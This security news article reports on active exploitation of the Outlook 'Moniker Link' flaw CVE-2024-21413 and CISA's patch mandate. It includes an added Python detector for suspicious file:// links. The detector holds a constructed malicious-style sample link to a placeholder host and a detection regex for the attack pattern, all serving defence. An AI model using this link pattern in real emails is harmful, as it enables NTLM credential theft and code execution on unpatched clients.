Critical RCE bug in Microsoft Outlook now exploited in attacks

CISA warned U.S. federal agencies on Thursday to secure their systems against ongoing attacks targeting a critical Microsoft Outlook remote code execution (RCE) vulnerability.

Discovered by Check Point vulnerability researcher Haifei Li and tracked as CVE-2024-21413, the flaw is caused by improper input validation when opening emails with malicious links using vulnerable Outlook versions.

The attackers gain remote code execution capabilities because the flaw lets them bypass Protected View (which should block harmful content embedded in Office files by opening them in read-only mode) and open malicious Office files in editing mode.

When it patched CVE-2024-21413 one year ago, Microsoft also warned that the Preview Pane is an attack vector, allowing successful exploitation even when previewing maliciously crafted Office documents.

As Check Point explained, this security flaw (dubbed Moniker Link) lets threat actors bypass built-in Outlook protections for malicious links embedded in emails by using the file:// protocol and adding an exclamation mark to URLs pointing to attacker-controlled servers.

The exclamation mark is added right after the file extension, followed by random text (in their example, Check Point used "something"), as shown below:

*CLICK ME*
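As an added illustration for defenders (not code from the article or from Check Point), the following Python snippet scans an HTML email body for hyperlinks that match the pattern just described: a file:// target whose file extension is immediately followed by an exclamation mark and trailing text. The sample bodies and the example.invalid host are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit, unquote

# Pattern described in the article: a file extension followed directly by "!"
# and at least one more character (the "random text" after the extension).
MONIKER_SUFFIX = re.compile(r"\.[A-Za-z0-9]{1,8}!.")


class _HrefCollector(HTMLParser):
    """Collects href attribute values from <a> tags in an HTML email body."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "a":
            for name, value in attrs:
                if name.lower() == "href" and value:
                    self.hrefs.append(value.strip())


def is_suspicious_file_link(href):
    """True if href uses the file: scheme and its path carries a '!' suffix after the extension."""
    parts = urlsplit(href)
    if parts.scheme.lower() != "file":
        return False
    # Percent-decode so an encoded "%21" cannot hide the exclamation mark.
    path = unquote(parts.path)
    return bool(MONIKER_SUFFIX.search(path))


def find_moniker_links(html_body):
    """Return every href in html_body that matches the Moniker Link pattern."""
    collector = _HrefCollector()
    collector.feed(html_body)
    return [h for h in collector.hrefs if is_suspicious_file_link(h)]


# Constructed sample email bodies (not taken from the article); example.invalid is a reserved name.
SAMPLE_BENIGN = '<p>Report: <a href="https://example.invalid/report.docx">open</a></p>'
SAMPLE_SUSPECT = '<p><a href="file:///\\\\example.invalid\\share\\test.rtf!something">CLICK ME</a></p>'

if __name__ == "__main__":
    for body in (SAMPLE_BENIGN, SAMPLE_SUSPECT):
        print(find_moniker_links(body))  # prints [] then the one flagged href
```

A mail gateway rule built on this check should quarantine rather than rewrite the message, since the Preview Pane alone is enough to trigger the flaw on unpatched clients.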

CVE-2024-21413 impacts multiple Office products, including Microsoft Office LTSC 2021, Microsoft 365 Apps for Enterprise, Microsoft Outlook 2016, and Microsoft Office 2019, and successful CVE-2024-21413 attacks can result in the theft of NTLM credentials and the execution of arbitrary code via maliciously crafted Office documents.

On Thursday, CISA added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, marking it as actively exploited. As mandated by the Binding Operational Directive (BOD) 22-01, federal agencies must secure their networks within three weeks, by February 27.

“These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise,” the cybersecurity agency warned.

While CISA primarily focuses on alerting federal agencies about vulnerabilities that should be patched as soon as possible, private organizations are also advised to prioritize patching these flaws to block ongoing attacks.
